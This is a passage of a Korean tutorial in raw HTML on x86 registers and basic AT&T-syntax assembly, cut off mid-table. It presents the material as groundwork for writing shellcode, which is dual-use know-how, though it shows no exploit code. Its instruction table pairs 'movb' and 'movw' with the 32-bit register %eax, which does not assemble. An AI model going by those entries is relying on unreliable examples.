&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gs <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ebp <br \/>&nbsp; &nbsp; &nbsp;&nbsp; esp &nbsp; &nbsp; &nbsp; &nbsp; <br \/><br \/>ax,bx,cx,dx\ub294 data\ub97c \uc9c1\uc811 \ucc98\ub9ac\ud558\ub294 \ub808\uc9c0\uc2a4\ud130\ub85c data\uc758 \ud06c\uae30\uc5d0 \ub530\ub77c 1\ubc14\uc774\ud2b8, 2\ubc14\uc774\ud2b8, 4\ubc14\uc774\ud2b8\ub85c&nbsp; <br \/>\ub098\ub204\uc5b4 \uc0ac\uc6a9\ud560 \uc218\ub3c4 \uc788\ub2e4. \uc989 ax\ub294 2\ubc14\uc774\ud2b8\uc778\ub370 al(1\ubc14\uc774\ud2b8) + ah(1\ubc14\uc774\ud2b8)\ub85c \ub098\ub204\uc5b4 \uc4f8\uc218\uc788\uc73c\uba70&nbsp; <br \/>al\uc740 ax\uc758 \ub0ae\uc740\ucabd 1\ubc14\uc774\ud2b8(8\ube44\ud2b8), ah\uc740 \ub192\uc740\ucabd 1\ubc14\uc774\ud2b8(8\ube44\ud2b8)\ub97c \uc758\ubbf8\ud55c\ub2e4. 
\ub610\ud55c ax\uc55e\uc5d0 e\ub97c \ubd99\uc774\uba74&nbsp; <br \/>4\ubc14\uc774\ud2b8\ub85c\uc758 \ud655\uc7a5\uc744 \uc758\ubbf8\ud55c\ub2e4.&nbsp; \uc774\uac83\uc744 \ub3c4\uc2dd\ud654 \ud558\uba74 <br \/><br \/>&nbsp;&nbsp; +----+----+----+----+ <br \/>&nbsp;&nbsp; | &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; &nbsp;| &nbsp; eax &nbsp;&nbsp; ( 4\ubc14\uc774\ud2b8, 32\ube44\ud2b8,&nbsp; 0 ~ 0xffffffff ) <br \/>&nbsp;&nbsp; +----+----+----+----+ <br \/>&nbsp;&nbsp; | &nbsp; &nbsp; &nbsp;| &nbsp;&nbsp; &nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ax &nbsp; &nbsp; ( 2\ubc14\uc774\ud2b8, 16\ube44\ud2b8,&nbsp; 0 ~ 0xffff ) <br \/>&nbsp;&nbsp; +----+----+ <br \/>&nbsp;&nbsp; |&nbsp; al&nbsp; | ah | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; al,ah&nbsp; ( 1\ubc14\uc774\ud2b8,&nbsp; 8\ube44\ud2b8,&nbsp; 0 ~ 0xff ) <br \/>&nbsp;&nbsp; +----+----+ <br \/><br \/>&nbsp;&nbsp; 4\ubc14\uc774\ud2b8 &nbsp; | &nbsp; 2\ubc14\uc774\ud2b8&nbsp; &nbsp;|&nbsp; 1\ubc14\uc774\ud2b8 <br \/>&nbsp;&nbsp; ---------+-----------+--------- <br \/>&nbsp; &nbsp; eax &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; ax &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; al , ah <br \/>&nbsp; &nbsp; ebx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; bx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; bl , bh <br \/>&nbsp; &nbsp; ecx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; cx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; cl , ch <br \/>&nbsp; &nbsp; edx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; dx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; dl , dh <br \/><br \/>\uc774\ub807\uac8c data\ucc98\ub9ac \ub808\uc9c0\uc2a4\ud130\uc758 \ud06c\uae30\ub97c \ub098\ub204\uc5b4 \uc4f0\ub294 \uac83\uc740 \ud6a8\uc728\uc801\uc778 \uad00\ub9ac\uce21\uba74\uc5d0\uc11c\ub3c4 \uc758\ubbf8\uac00 \uc788\uaca0\uc9c0\ub9cc&nbsp; <br \/>shellcode\uc81c\uc791\uc2dc\uc5d4 NULL(0x00)\ucc98\ub9ac\uc744 \uc704\ud574 \uc911\uc694\ud558\ub2e4. 
\uc880\ub354 \uad6c\uccb4\uc801\uc778 \ubd80\ubd84\uc740 \ucc28\ucc28 \uc124\uba85\ud558\uae30\ub85c \ud55c\ub2e4. <br \/><br \/>esi,edi,ebp,esp\uc5d0 \ub300\ud574\uc11c \uc54c\uc544\ubcf4\uc790. si\ub294 source index, di\ub294 destination index\uc758 \uc57d\uc790\ub85c \ud544\uc694\uc2dc <br \/>\ubc30\uc5f4 \ucc38\uc870\ud560\ub54c \uc0ac\uc6a9\ud558\ub294 \ub808\uc9c0\uc2a4\ud130 \uc815\ub3c4\ub85c \uc774\ud574 \ud558\uba74 \ub420\uac70 \uac19\uace0, esp\ub294&nbsp; stack pointer\ub85c \ud504\ub85c\uadf8\ub7a8 <br \/>\uc774 \uc9c4\ud589 \ub418\ub294 \ub3d9\uc548 stack\uc758 \ucd5c\uc885 \uc8fc\uc18c\ub97c \uc800\uc7a5\ud558\ub294 \uacf3\uc774\ub2e4. \ud504\ub85c\uadf8\ub7a8\uc774 \uc9c4\ud589\uc774\ub780 \uc758\ubbf8\ub294 \uc2a4\ud0dd\uc5d0 data <br \/>\uac00 \uc800\uc7a5\ub418\uace0 \ube60\uc9c0\ub294 \ub3d9\uc548 \uacc4\uc18d \ubcc0\uacbd\ub41c\ub2e4\ub294 \uac83\uc744 \uc758\ubbf8\ud55c\ub2e4. \uc774\ub807\uac8c esp\uac00 \uacc4\uc18d \ubcc0\uacbd\ub418\ubbc0\ub85c \ud55c \ud568\uc218 <br \/>(frame) \ub0b4\uc5d0\uc11c stack\uc758 \uae30\uc900 \uc8fc\uc18c\ub97c \uc124\uc815\ud558\uac8c \ub418\ub294\ub370 \uc774\uac83\uc774 ebp(base pointer, frame pointer)&nbsp; <br \/>\uc774\ub2e4. \uadf8\ub7ec\ubbc0\ub85c \uc77c\ubc18\uc801\uc73c\ub85c \ud568\uc218 \ub0b4\uc5d0\uc11c \uccab\ubc88\uc9f8\ub85c \ud558\ub294 \uc77c\uc774 \uae30\uc874 ebp\ub97c \uc800\uc7a5(pushl %ebp)\ud558\uace0 \ucd08\uae30 <br \/>\uc758 esp\ub97c ebp\ub85c \uc124\uc815(movl %esp, %ebp)\ud558\ub294 \uc791\uc5c5\uc744 \ud55c\ub2e4. \ub4a4\uc5d0 \uc2e4\uc81c \ud504\ub85c\uadf8\ub7a8\ub0b4\uc5d0\uc11c \uc880\ub354 \uc0c1\uc138\ud788&nbsp; <br \/>\uc774\ud574 \ud558\ub3c4\ub85d \ud558\uc790. 
<br \/><br \/>&lt;\uc5b4\uc148\ube14\ub9ac \uad6c\uc870\uc640 \uae30\ubcf8 \uba85\ub839\uc5b4&gt; <br \/>\uc5b4\uc148\ube14\ub9ac\uc758 \uae30\ubcf8 \uad6c\uc870\ub294 \uc544\ub798\uc640 \uac19\uc774 5\uac1c\uc758 \uc601\uc5ed(\ubd80\ubd84)\uc73c\ub85c&nbsp; \ub098\ub204\uc5b4\uc838 \uc788\uc73c\uba70, Linux\uc758 \uacbd\uc6b0\uc5d0\ub294&nbsp; <br \/>AT&amp;T syntax\ub97c \ub530\ub974\uae30 \ub54c\ubb38\uc5d0 \uc624\ud53c\ucf54\ub4dc\uc758 \uba85\ub839\uc774 \uc81c1\uc624\ud53c\ub79c\ub4dc\uc5d0\uc11c \uc81c2\uc624\ud53c\ub79c\ub4dc\ucabd\uc73c\ub85c \uc791\uc6a9\ud55c\ub2e4. <br \/>\uc989 \uc544\ub798\uc758 \uc608\uc81c\uc758 \uacbd\uc6b0 %esi\uc758 \uac12\uc774 %ebp\uc5d0 \ub4e4\uc5b4\uac00\uac8c \ub41c\ub2e4. <br \/><br \/><\/P>\n\n<TABLE style=\"WIDTH: 325pt; BORDER-COLLAPSE: collapse\" border=0 cellSpacing=0 cellPadding=0 width=431 x:str>\n<COLGROUP>\n<COL style=\"WIDTH: 41pt; mso-width-source: userset; mso-width-alt: 1536\" width=54>\n<COL style=\"WIDTH: 65pt; mso-width-source: userset; mso-width-alt: 2446\" width=86>\n<COL style=\"WIDTH: 74pt; mso-width-source: userset; mso-width-alt: 2787\" width=98>\n<COL style=\"WIDTH: 69pt; mso-width-source: userset; mso-width-alt: 2616\" width=92>\n<COL style=\"WIDTH: 76pt; mso-width-source: userset; mso-width-alt: 2872\" width=101>\n<TBODY>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: silver; WIDTH: 41pt; HEIGHT: 13.5pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 width=54><FONT size=2><STRONG>\ub77c\ubca8 <\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 65pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 width=86><FONT size=2><STRONG>\uc624\ud53c\ucf54\ub4dc &nbsp;<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; 
BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 74pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 width=98><FONT size=2><STRONG>\uc81c1\uc624\ud53c\ub79c\ub4dc<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 69pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 width=92><FONT size=2><STRONG>\uc81c2\uc624\ud53c\ub79c\ub4dc<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 76pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 width=101><STRONG><FONT size=2>\uc124\uba85\ubb38(\uc8fc\uc11d)<\/FONT><\/STRONG><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 height=18><FONT size=2>main:<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25><FONT size=2>movl<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25><FONT size=2>%esi, <\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25><FONT size=2>%ebp &nbsp; &nbsp; &nbsp; &nbsp;<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25><FONT size=2>; 
comment<\/FONT><\/TD><\/TR><\/TBODY><\/TABLE>\n\n<P><br \/><br \/>\ub77c\ubca8\uc740 \uc9c1\uc811 \uae30\uacc4\uc5b4\ub85c \ubc88\uc5ed\ub418\uc9c0 \uc54a\uace0 \ubd84\uae30\uba85\ub839(jmp, call)\ub4f1\uc5d0\uc11c \ucc38\uc870\ub418\uc5b4 \uc8fc\uc18c\uc758 \uacc4\uc0b0\uc5d0 \uc0ac\uc6a9\ub41c\ub2e4. <br \/>\uc624\ud53c\ucf54\ub4dc\ub294 \uba85\ub839\uc5b4\uc774\uba70 \uc81c1 &amp; 2 \uc624\ud53c\ub79c\ub4dc\ub294 \ud544\uc694\ud55c \uc778\uc218\ub4e4\uc774\ub2e4.. \uc624\ud53c\ub79c\ub4dc\ub294 \uc624\ud53c\ucf54\ub4dc\uc5d0 \ub530\ub77c \ud55c\uac1c <br \/>\ud639\uc740 2\uac1c\ub97c \uc0ac\uc6a9\ud560\uc218 \uc788\ub2e4.&nbsp; \uae30\ubcf8 \uc624\ud53c\ucf54\ub4dc(\uba85\ub839\uc5b4)\uc5d0 \ub300\ud558\uc5ec \uc758\ubbf8\uc640 \uc0ac\uc6a9\ubc95\uc744 \uc54c\uc544\ubcf4\uc790. Linux\uc5d0\uc11c <br \/>\ub294 AT&amp;T syntax\uc744 \ub530\ub974\uae30 \ub54c\ubb38\uc5d0 \uc774\uc5d0 \uc900\ud558\uc5ec \uc124\uba85\ud558\uaca0\ub2e4. <br \/><\/P>\n\n<TABLE style=\"WIDTH: 378pt; BORDER-COLLAPSE: collapse\" border=0 cellSpacing=0 cellPadding=0 width=503 x:str>\n<COLGROUP>\n<COL style=\"WIDTH: 41pt; mso-width-source: userset; mso-width-alt: 1536\" width=54>\n<COL style=\"WIDTH: 102pt; mso-width-source: userset; mso-width-alt: 3868\" width=136>\n<COL style=\"WIDTH: 128pt; mso-width-source: userset; mso-width-alt: 4835\" width=170>\n<COL style=\"WIDTH: 107pt; mso-width-source: userset; mso-width-alt: 4067\" width=143>\n<TBODY>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: silver; WIDTH: 41pt; HEIGHT: 13.5pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 height=18 width=54><FONT size=2><STRONG>\uba85\ub839\uc5b4<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 102pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" 
class=xl25 width=136 x:str=\" \uc774\uc6a9 \ubc29\ubc95 \"><FONT size=2><STRONG><SPAN style=\"mso-spacerun: yes\">&nbsp;&nbsp; <\/SPAN>\uc774\uc6a9 \ubc29\ubc95<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 128pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=170 x:str=\" \uba85\ub839\uc5b4\uc758 \uc758\ubbf8 \"><FONT size=2><STRONG><SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>\uba85\ub839\uc5b4\uc758 \uc758\ubbf8<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 107pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=143 x:str=\" C\uc5d0\uc11c\uc758 \uc720\uc0ac \ud45c\ud604 \"><STRONG><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN>C\uc5d0\uc11c\uc758 \uc720\uc0ac \ud45c\ud604<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/STRONG><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" mov \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>mov<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" movb $0x1,%eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>movb $0x1,%eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: 
windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" 1\uc744 eax\uc5d0 \ub123\uc74c.(1 \ubc14\uc774\ud2b8) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>1\uc744 eax\uc5d0 \ub123\uc74c.(1 \ubc14\uc774\ud2b8)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = 0x01 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = 0x01<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" \"><SPAN style=\"mso-spacerun: yes\"><FONT size=2>&nbsp; &nbsp; &nbsp; <\/FONT><\/SPAN><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" movw $0x1,%eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>movw $0x1,%eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" 1\uc744 eax\uc5d0 \ub123\uc74c.(2 \ubc14\uc774\ud2b8) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>1\uc744 eax\uc5d0 \ub123\uc74c.(2 \ubc14\uc774\ud2b8)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; 
BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = 0x0001 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = 0x0001<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" \"><SPAN style=\"mso-spacerun: yes\"><FONT size=2>&nbsp; &nbsp; &nbsp; <\/FONT><\/SPAN><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" movl $0x1,%eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>movl $0x1,%eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" 1\uc744 eax\uc5d0 \ub123\uc74c.(4 \ubc14\uc774\ud2b8) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>1\uc744 eax\uc5d0 \ub123\uc74c.(4 \ubc14\uc774\ud2b8)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = 0x00000001 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = 0x00000001<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: 
windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" add \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>add<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" addl $1, %eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>addl $1, %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax\uc5d0 1\uc744 \ub354\ud558\ub77c. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0 1\uc744 \ub354\ud558\ub77c.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = eax + 1 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = eax + 1<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" sub \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>sub<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" subl $1, %eax \"><FONT size=2><SPAN 
style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>subl $1, %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax\uc5d0\uc11c 1\uc744 \ube7c\ub77c. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0\uc11c 1\uc744 \ube7c\ub77c.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = eax - 1 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = eax - 1<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" inc \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>inc<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" incl %eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>incl %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax\uc5d0 1\uc744 \uc99d\uac00. 
\"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0 1\uc744 \uc99d\uac00.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax++ \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax++<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" dec \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>dec<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" decl %eax \"><FONT size=2><SPAN 